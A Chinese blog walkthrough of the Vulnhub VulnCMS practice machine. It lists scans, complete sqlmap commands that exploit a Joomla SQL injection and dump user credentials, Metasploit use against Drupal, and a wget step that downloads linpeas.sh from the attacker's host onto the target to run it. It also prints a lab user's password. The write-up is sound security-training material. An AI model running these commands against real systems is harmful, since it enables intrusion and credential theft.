Vulnhub-VulnCMS
存活
1 | kali 192.168.169.220 |
靶机扫描
1 | 22 80 5000 8081 9001 |
访问
80
5000
8081
9001
1 | 三个端口都是cms系统 |
漏洞利用
80
- 首先扫一下目录
- 文件目录
1 | 发现两个疑似用户名:Mobley 和 Elloit,并且说了暴力破解没什么用。 |
5000 (Wordpress)
- 直接上
wpscan
扫描
1 | wpscan --url http://192.168.169.230:5000/ -e u,p |
- 没什么有用的价值
8081 (Joomla)
- 使用
Joomscan
扫一下
1 | joomscan -u http://192.168.169.230:8081/ |
- 有个
sql注入
开始注入
1 | sqlmap -u "http://192.168.169.230:8081//index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=* " --dbs --batch |
1 | sqlmap -u "http://192.168.169.230:8081/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=* " -D "joomla_db" --tables --batch |
1 | sqlmap -u "http://192.168.169.230:8081/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=* " -D "joomla_db" -T "hs23w_users" --columns --batch |
1 | sqlmap -u "http://192.168.169.230:8081/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=* " -D "joomla_db" -T "hs23w_users" -C "username,password,name,email" --dump --batch |
1 | 导出信息 |
1 | 虽然密码加密,但是 email 列有一个看起来像密码 |
9001(Drupal 7)
- 上
msf
- 查看一些文件
- 有上面
sql
的信息,尝试ssh
提权
- kali利用Python开启http服务,靶机里下载脚本 linpeas.sh,获取信息
- 靶机使用
wget
下载
1 | wget http://192.168.169.220/linpeas.sh |
- 加权限,运行文件
tyrell
用户的密码mR_R0bo7_i5_R3@!_
登陆成功
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Putdownd’s Blog!